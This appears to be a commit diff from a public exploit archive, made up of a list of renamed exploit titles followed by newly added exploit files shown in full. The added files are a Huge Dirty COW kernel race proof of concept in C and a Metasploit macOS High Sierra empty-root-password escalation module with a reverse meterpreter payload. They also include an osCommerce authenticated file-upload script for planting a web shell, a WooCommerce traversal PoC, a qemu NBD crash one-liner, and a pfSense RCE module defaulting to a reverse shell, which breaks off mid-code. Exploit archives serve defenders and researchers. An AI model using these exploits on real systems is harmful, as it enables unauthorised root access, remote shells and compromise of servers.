< 5.1.8 - Local Privilege Escalation UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation macOS High Sierra - Root Privilege Escalation (Metasploit) lftp 2.6.9 - Remote Stack based Overflow lftp 2.6.9 - Remote Stack Overflow BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH) KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC) HP 
Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Buffer Overflow Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit) Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit) Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit) Citrix Gateway - ActiveX Control Stack Buffer Overflow (Metasploit) Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit) Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack Buffer Overflow (Metasploit) Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (1) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (2) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (3) GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2) GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (2) Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Buffer Overflow Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Buffer Overflow AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Buffer Overflow Xine-Lib 1.1.11 - 
Multiple Heap Based Remote Buffer Overflow Vulnerabilities Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow Vim - 'mch_expand_wildcards()' Heap Buffer Overflow Acunetix 8 build 20120704 - Remote Stack Based Overflow Acunetix 8 build 20120704 - Remote Stack Overflow Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Buffer Overflow TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Based Buffer Overflow Stub TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub glibc - 'getaddrinfo' Stack Based Buffer Overflow glibc - 'getaddrinfo' Remote Stack Buffer Overflow BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal R2/Extreme 1.65 - Stack Buffer Overflow / Directory Traversal Alligra Calligra - Heap Based Buffer Overflow Alligra Calligra - Heap Buffer Overflow Aloaha PDF Suite - Stack Based Buffer Overflow Aloaha PDF Suite - Remote Stack Buffer Overflow EasyCafe Server 2.2.14 - Remote File Read Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit) ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit) Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit) Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit) pfSense - Authenticated Group Member Remote Command Execution (Metasploit) Almnzm - 'COOKIE: customer' SQL Injection Tutorialms 1.4 (show) - SQL Injection Tutorialms 1.4 - 'show' SQL Injection osCommerce 2.3.4.1 - Arbitrary File Upload Knowledge Base Enterprise Edition 4.62.00 
- SQL Injection Knowledge Base Enterprise Edition 4.62.0 - SQL Injection WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload phpDolphin 2.0.5 - Multiple Vulnerabilities OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities AbanteCart 1.2.7 - Cross-Site Scripting MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution Symantec Messaging Gateway 10.6.3-2 - Unauthenticated Root Remote Command Execution phpCollab 2.5.1 - Arbitrary File Upload phpCollab 2.5.1 - SQL Injection phpCollab 2.5.1 - Arbitrary File Upload phpCollab 2.5.1 - SQL Injection Synology StorageManager 5.2 - Remote Root Command Execution Synology StorageManager 5.2 - Root Remote Command Execution WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal --- exploits/jsp/webapps/{40065.txt => 40065.md} | 0 exploits/linux/dos/{38857.txt => 38857.md} | 0 exploits/linux/dos/43194.txt | 20 + exploits/linux/dos/43199.c | 181 +++++++ exploits/linux/local/{39992.txt => 39992.md} | 0 exploits/linux/local/{41158.txt => 41158.md} | 0 exploits/linux/local/{42936.txt => 42936.md} | 0 exploits/linux/local/{42937.txt => 42937.md} | 0 exploits/linux/{local => remote}/23154.c | 0 exploits/linux/{local => remote}/25080.txt | 0 exploits/macos/local/43201.rb | 55 ++ .../multiple/local/{41021.txt => 41021.md} | 0 exploits/netware/{local => remote}/19364.txt | 0 exploits/osx/local/{41149.txt => 41149.md} | 0 exploits/php/webapps/{38750.txt => 38750.md} | 0 exploits/php/webapps/{39243.txt => 39243.md} | 0 exploits/php/webapps/{40877.txt => 40877.md} | 0 exploits/php/webapps/{41150.txt => 41150.md} | 0 exploits/php/webapps/{41746.txt => 41746.md} | 0 
exploits/php/webapps/{41747.txt => 41747.md} | 0 exploits/php/webapps/{41967.txt => 41967.md} | 0 exploits/php/webapps/{42934.txt => 42934.md} | 0 exploits/php/webapps/{42935.txt => 42935.md} | 0 exploits/php/webapps/43191.py | 119 +++++ exploits/php/webapps/43196.txt | 43 ++ exploits/php/webapps/{9035.txt => 9035.php} | 0 exploits/unix/remote/43193.rb | 189 +++++++ exploits/win_x86/local/43192.c | 68 +++ exploits/windows/{remote => local}/26497.c | 2 + exploits/windows/{remote => local}/35714.pl | 0 exploits/windows/{local => remote}/39102.py | 0 exploits/windows/{local => remote}/40043.py | 0 files_exploits.csv | 475 +++++++++--------- 33 files changed, 918 insertions(+), 234 deletions(-) rename exploits/jsp/webapps/{40065.txt => 40065.md} (100%) rename exploits/linux/dos/{38857.txt => 38857.md} (100%) create mode 100644 exploits/linux/dos/43194.txt create mode 100644 exploits/linux/dos/43199.c rename exploits/linux/local/{39992.txt => 39992.md} (100%) rename exploits/linux/local/{41158.txt => 41158.md} (100%) rename exploits/linux/local/{42936.txt => 42936.md} (100%) rename exploits/linux/local/{42937.txt => 42937.md} (100%) rename exploits/linux/{local => remote}/23154.c (100%) rename exploits/linux/{local => remote}/25080.txt (100%) create mode 100755 exploits/macos/local/43201.rb rename exploits/multiple/local/{41021.txt => 41021.md} (100%) rename exploits/netware/{local => remote}/19364.txt (100%) rename exploits/osx/local/{41149.txt => 41149.md} (100%) rename exploits/php/webapps/{38750.txt => 38750.md} (100%) rename exploits/php/webapps/{39243.txt => 39243.md} (100%) rename exploits/php/webapps/{40877.txt => 40877.md} (100%) rename exploits/php/webapps/{41150.txt => 41150.md} (100%) rename exploits/php/webapps/{41746.txt => 41746.md} (100%) rename exploits/php/webapps/{41747.txt => 41747.md} (100%) rename exploits/php/webapps/{41967.txt => 41967.md} (100%) rename exploits/php/webapps/{42934.txt => 42934.md} (100%) rename exploits/php/webapps/{42935.txt => 
42935.md} (100%) create mode 100755 exploits/php/webapps/43191.py create mode 100644 exploits/php/webapps/43196.txt rename exploits/php/webapps/{9035.txt => 9035.php} (100%) create mode 100755 exploits/unix/remote/43193.rb create mode 100644 exploits/win_x86/local/43192.c rename exploits/windows/{remote => local}/26497.c (97%) rename exploits/windows/{remote => local}/35714.pl (100%) rename exploits/windows/{local => remote}/39102.py (100%) rename exploits/windows/{local => remote}/40043.py (100%) diff --git a/exploits/jsp/webapps/40065.txt b/exploits/jsp/webapps/40065.md similarity index 100% rename from exploits/jsp/webapps/40065.txt rename to exploits/jsp/webapps/40065.md diff --git a/exploits/linux/dos/38857.txt b/exploits/linux/dos/38857.md similarity index 100% rename from exploits/linux/dos/38857.txt rename to exploits/linux/dos/38857.md diff --git a/exploits/linux/dos/43194.txt b/exploits/linux/dos/43194.txt new file mode 100644 index 000000000..4185b0553 --- /dev/null +++ b/exploits/linux/dos/43194.txt 
@@ -0,0 +1,20 @@ +Introduced in commit f37708f6b8 (2.10). The NBD spec says a client +can request export names up to 4096 bytes in length, even though +they should not expect success on names longer than 256. However, +qemu hard-codes the limit of 256, and fails to filter out a client +that probes for a longer name; the result is a stack smash that can +potentially give an attacker arbitrary control over the qemu +process. + +The smash can be easily demonstrated with this client: + +$ qemu-io f raw nbd://localhost:10809/$(printf %3000d 1 | tr ' ' a) + +If the qemu NBD server binary (whether the standalone qemu-nbd, or +the builtin server of QMP nbd-server-start) was compiled with +-fstack-protector-strong, the ability to exploit the stack smash +into arbitrary execution is a lot more difficult (but still +theoretically possible to a determined attacker, perhaps in +combination with other CVEs). Still, crashing a running qemu (and +losing the VM) is bad enough, even if the attacker did not obtain +full execution control. \ No newline at end of file diff --git a/exploits/linux/dos/43199.c b/exploits/linux/dos/43199.c new file mode 100644 index 000000000..7c241bb54 --- /dev/null +++ b/exploits/linux/dos/43199.c 
@@ -0,0 +1,181 @@ +// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0 +// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC +// Author Note: Before running, make sure to set transparent huge pages to "always": `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled` +// + +// +// The Huge Dirty Cow POC. This program overwrites the system's huge zero page. +// Compile with "gcc -pthread main.c" +// +// November 2017 +// Bindecy +// + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAP_BASE ((void *)0x4000000) +#define MAP_SIZE (0x200000) +#define MEMESET_VAL (0x41) +#define PAGE_SIZE (0x1000) +#define TRIES_PER_PAGE (20000000) + +struct thread_args { + char *thp_map; + char *thp_chk_map; + off_t off; + char *buf_to_write; + int stop; + int mem_fd1; + int mem_fd2; +}; + +typedef void * (*pthread_proc)(void *); + +void *unmap_and_read_thread(struct thread_args *args) { + char c; + int i; + for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { + madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page. + + memcpy(&c, args->thp_map + args->off, sizeof(c)); + read(args->mem_fd2, &c, sizeof(c)); + + lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET); + usleep(10); // We placed the zero page and marked its PMD as dirty. + // Give get_user_pages() another chance before madvise()-ing again. + } + + return NULL; +} + +void *write_thread(struct thread_args *args) { + int i; + for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { + lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET); + madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail. 
+ write(args->mem_fd1, args->buf_to_write, PAGE_SIZE); + } + + return NULL; +} + +void *wait_for_success(struct thread_args *args) { + while (args->thp_chk_map[args->off] != MEMESET_VAL) { + madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED); + sched_yield(); + } + + args->stop = 1; + return NULL; +} + +int main() { + struct thread_args args; + void *thp_chk_map_addr; + int ret; + + // Mapping base should be a multiple of the THP size, so we can work with the whole huge page. + args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (args.thp_map == MAP_FAILED) { + perror("[!] mmap()"); + return -1; + } + if (args.thp_map != MAP_BASE) { + fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n"); + goto err_unmap1; + } + + printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map); + + thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge + args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (args.thp_chk_map == MAP_FAILED) { + perror("[!] mmap()"); + goto err_unmap1; + } + if (args.thp_chk_map != thp_chk_map_addr) { + fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n"); + goto err_unmap2; + } + + ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); + ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE); + if (ret) { + perror("[!] madvise()"); + goto err_unmap2; + } + + args.buf_to_write = malloc(PAGE_SIZE); + if (!args.buf_to_write) { + perror("[!] malloc()"); + goto err_unmap2; + } + memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE); + + args.mem_fd1 = open("/proc/self/mem", O_RDWR); + if (args.mem_fd1 < 0) { + perror("[!] open()"); + goto err_free; + } + + args.mem_fd2 = open("/proc/self/mem", O_RDWR); + if (args.mem_fd2 < 0) { + perror("[!] open()"); + goto err_close1; + } + + printf("[*] Racing. 
Gonna take a while...\n"); + args.off = 0; + + // Overwrite every single page + while (args.off < MAP_SIZE) { + pthread_t threads[3]; + args.stop = 0; + + ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args); + ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args); + ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args); + + if (ret) { + perror("[!] pthread_create()"); + goto err_close2; + } + + pthread_join(threads[0], NULL); // This call will return only after the overwriting is done + pthread_join(threads[1], NULL); + pthread_join(threads[2], NULL); + + args.off += PAGE_SIZE; + printf("[*] Done 0x%lx bytes\n", args.off); + } + + printf("[*] Success!\n"); + +err_close2: + close(args.mem_fd2); +err_close1: + close(args.mem_fd1); +err_free: + free(args.buf_to_write); +err_unmap2: + munmap(args.thp_chk_map, MAP_SIZE); +err_unmap1: + munmap(args.thp_map, MAP_SIZE); + + if (ret) { + fprintf(stderr, "[!] Exploit failed.\n"); + } + + return ret; +} \ No newline at end of file diff --git a/exploits/linux/local/39992.txt b/exploits/linux/local/39992.md similarity index 100% rename from exploits/linux/local/39992.txt rename to exploits/linux/local/39992.md diff --git a/exploits/linux/local/41158.txt b/exploits/linux/local/41158.md similarity index 100% rename from exploits/linux/local/41158.txt rename to exploits/linux/local/41158.md diff --git a/exploits/linux/local/42936.txt b/exploits/linux/local/42936.md similarity index 100% rename from exploits/linux/local/42936.txt rename to exploits/linux/local/42936.md diff --git a/exploits/linux/local/42937.txt b/exploits/linux/local/42937.md similarity index 100% rename from exploits/linux/local/42937.txt rename to exploits/linux/local/42937.md diff --git a/exploits/linux/local/23154.c b/exploits/linux/remote/23154.c similarity index 100% rename from exploits/linux/local/23154.c rename to exploits/linux/remote/23154.c 
diff --git a/exploits/linux/local/25080.txt b/exploits/linux/remote/25080.txt similarity index 100% rename from exploits/linux/local/25080.txt rename to exploits/linux/remote/25080.txt diff --git a/exploits/macos/local/43201.rb b/exploits/macos/local/43201.rb new file mode 100755 index 000000000..59346702e --- /dev/null +++ b/exploits/macos/local/43201.rb 
@@ -0,0 +1,55 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X Root Privilege Escalation', + 'Description' => %q{ + This module exploits a serious flaw in MacOSX High Sierra. + Any user can login with user "root", leaving an empty password. + }, + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], + [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], + [ 'URL', 'https://forums.developer.apple.com/thread/79235' ], + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 29 2017' + )) + end + + def exploit_cmd(root_payload) + "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" + end + + def exploit + payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + print_status("Writing payload file as '#{payload_file}'") + write_file(payload_file, payload.raw) + register_file_for_cleanup(payload_file) + output = cmd_exec("chmod +x #{payload_file}") + print_status("Executing payload file as '#{payload_file}'") + cmd_exec(exploit_cmd(payload_file)) + end +end \ No newline at end of file diff --git a/exploits/multiple/local/41021.txt b/exploits/multiple/local/41021.md similarity index 100% rename from exploits/multiple/local/41021.txt rename to exploits/multiple/local/41021.md 
diff --git a/exploits/netware/local/19364.txt b/exploits/netware/remote/19364.txt similarity index 100% rename from exploits/netware/local/19364.txt rename to exploits/netware/remote/19364.txt diff --git a/exploits/osx/local/41149.txt b/exploits/osx/local/41149.md similarity index 100% rename from exploits/osx/local/41149.txt rename to exploits/osx/local/41149.md diff --git a/exploits/php/webapps/38750.txt b/exploits/php/webapps/38750.md similarity index 100% rename from exploits/php/webapps/38750.txt rename to exploits/php/webapps/38750.md diff --git a/exploits/php/webapps/39243.txt b/exploits/php/webapps/39243.md similarity index 100% rename from exploits/php/webapps/39243.txt rename to exploits/php/webapps/39243.md diff --git a/exploits/php/webapps/40877.txt b/exploits/php/webapps/40877.md similarity index 100% rename from exploits/php/webapps/40877.txt rename to exploits/php/webapps/40877.md diff --git a/exploits/php/webapps/41150.txt b/exploits/php/webapps/41150.md similarity index 100% rename from exploits/php/webapps/41150.txt rename to exploits/php/webapps/41150.md diff --git a/exploits/php/webapps/41746.txt b/exploits/php/webapps/41746.md similarity index 100% rename from exploits/php/webapps/41746.txt rename to exploits/php/webapps/41746.md diff --git a/exploits/php/webapps/41747.txt b/exploits/php/webapps/41747.md similarity index 100% rename from exploits/php/webapps/41747.txt rename to exploits/php/webapps/41747.md diff --git a/exploits/php/webapps/41967.txt b/exploits/php/webapps/41967.md similarity index 100% rename from exploits/php/webapps/41967.txt rename to exploits/php/webapps/41967.md diff --git a/exploits/php/webapps/42934.txt b/exploits/php/webapps/42934.md similarity index 100% rename from exploits/php/webapps/42934.txt rename to exploits/php/webapps/42934.md diff --git a/exploits/php/webapps/42935.txt b/exploits/php/webapps/42935.md similarity index 100% rename from exploits/php/webapps/42935.txt rename to exploits/php/webapps/42935.md 
diff --git a/exploits/php/webapps/43191.py b/exploits/php/webapps/43191.py new file mode 100755 index 000000000..985a6d1d2 --- /dev/null +++ b/exploits/php/webapps/43191.py 
@@ -0,0 +1,119 @@ +# Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload +# Date: 11.11.2017 +# Exploit Author: Simon Scannell - https://scannell-infosec.net +# Vendor Homepage: https://www.oscommerce.com/ +# Software Link: https://www.oscommerce.com/Products&Download=oscom234 +# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable +# Tested on: Linux, Windows + +""" +osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user +being privileged enough to send newsletters can exploit an objection injection in the osCommerce core to +upload any file, allowing the user to gain shell access. The user does not need to be an administrator, +any account with access to the newsletters will do. +More details can be found here: + https://scannell-infosec.net/uploading-a-shell-from-within-the-oscommerce-admin-panel-via-object-injection/ +""" + +import urlparse +import argparse +import sys +import requests + + +DEFAULT_ADMIN_URL = "/catalog/admin/" +DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php" + + +# Builds an authenticated session and returns it if it was successful +def authenticate(username, password, url): + # Build the Session and grab the inital cookie + session = requests.Session() + session.get(url + "login.php", allow_redirects=False) + + get_params = {'action': "process"} + data = {"username": username, "password": password} + + # Attempt the authentication + r = session.post(url + "login.php", data=data, params=get_params, allow_redirects=False) + + if r.status_code == 302: + return session + else: + return False + + +def upload_file(local_filename, session, url): + newsletter_script = url + "newsletters.php" + r = session.get(newsletter_script, params={"action": "new"}) + + payload = { + 'module': 'upload', + 'title': 'uploaded_fname', + 'content': './' + } + + # Create the vulnerable newsletter and grab its ID + r = 
session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False) + try: + newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:] + print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id) + except: + print "[-] The script wasn't able to create a new newsletter" + exit(1) + + # Now lock the newsletter + r = session.post(newsletter_script, params={"action": "lock", "nID": newsletter_id}) + print "[+] Successfully locked the newsletter. Now attempting to upload.." + + # Send the final request, containing the file! + files = { + 'uploaded_fname': open(local_filename) + } + r = session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files) + + print "[*] Now trying to verify that the file %s uploaded.." % (local_filename) + + shell_url = url + local_filename + r = requests.get(shell_url) + print "[+] Got a HTTP 200 Reply for the uploaded file!" + print "[+] The uploaded file should now be available at %s" % (shell_url) + + + +# Main Routine starts here + +usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \ + "Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \ + "NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0]) + + +parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage) +parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True) +parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True) +parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True) +parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. 
This defaults to /catalog/admin/", required=False) +args = parser.parse_args() + +# Parse username and password +username = args.auth.split(":")[0] +password = args.auth.split(":")[1] + + +url = args.target_url +# If the user hasn't passed a path to the osCommerce Admin Panel, use the default +if not args.admin_path: + url += DEFAULT_ADMIN_URL +else: + url += args.admin_path + +# Authenticate the user and establish the connection +session = authenticate(username, password, url) + +if not session: + print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php") + exit(1) +else: + print "[+] Authentication successful" + +upload_file(args.file, session, url) \ No newline at end of file diff --git a/exploits/php/webapps/43196.txt b/exploits/php/webapps/43196.txt new file mode 100644 index 000000000..3e9bc51ec --- /dev/null +++ b/exploits/php/webapps/43196.txt 
@@ -0,0 +1,43 @@ +# Exploit Title: WordPress woocommerce directory traversal +# Date: 28-11-2017 +# Software Link: https://wordpress.org/plugins/woocommerce/ +# Exploit Author:fu2x2000 +# Contact: fu2x2000@gmail.com +# Website: +# CVE:2017-17058 +#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0 +# Category: webapps + + +1. Description + +Identifying woo commerce theme pluging properly sanitized against Directory +Traversal,even the latest version of WordPress with woocommerce can be +vulnerable. + +2. Proof of Concept + +$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; ` +function file_get_contents_utf8($fn) { + $opts = array( + 'http' => array( + 'method'=>"GET", + 'header'=>"Content-Type: text/html; charset=utf-8" + ) + ); + + $wp = stream_context_create($opts); + $result = @file_get_contents($fn,false,$wp); + return $result; +} +/* $head= header("Content-Type: text/html; charset=utf-8"); ; */ +header("Content-Type: text/html; charset=utf-8"); + +$result = file_get_contents_utf8("http://".$woo); + +echo $result; + + +Regards + +Fu2x200 \ No newline at end of file diff --git a/exploits/php/webapps/9035.txt b/exploits/php/webapps/9035.php similarity index 100% rename from exploits/php/webapps/9035.txt rename to exploits/php/webapps/9035.php diff --git a/exploits/unix/remote/43193.rb b/exploits/unix/remote/43193.rb new file mode 100755 index 000000000..42d5c3259 --- /dev/null +++ b/exploits/unix/remote/43193.rb 
@@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'pfSense authenticated group member RCE', + 'Description' => %q( + pfSense, a free BSD based open source firewall distribution, + version <= 2.3.1_1 contains a remote command execution + vulnerability post authentication in the system_groupmanager.php page. + Verified against 2.2.6 and 2.3. + ), + 'Author' => + [ + 's4squatch', # discovery + 'h00die' # module + ], + 'References' => + [ + [ 'EDB', '43128' ], + [ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => + { + 'SSL' => true, + 'PAYLOAD' => 'cmd/unix/reverse_openssl' + }, + 'Arch' => [ ARCH_CMD ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl openssl' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 06 2017' + ) + ) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']), + Opt::RPORT(443) + ], self.class + ) + end + + def login + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? 
+ vprint_status("CSRF Token for login: #{csrf}") + + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'POST', + 'vars_post' => { + '__csrf_magic' => csrf, + 'usernamefld' => datastore['USERNAME'], + 'passwordfld' => datastore['PASSWORD'], + 'login' => '' + } + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + if res.code == 302 + vprint_status('Successful Authentication') + return res.get_cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + return nil + end + end + + def detect_version(cookie) + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET', + 'cookie' => cookie + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + /Version.+(?[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body + if version + print_status("pfSense Version Detected: #{version}") + return Gem::Version.new(version) + end + # If the device isn't fully setup, you get stuck at redirects to wizard.php + # however, this does NOT stop exploitation strangely + print_error("pfSens Version Not Detected or wizard still enabled.") + Gem::Version.new('0.0') + end + + def check + begin + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? 
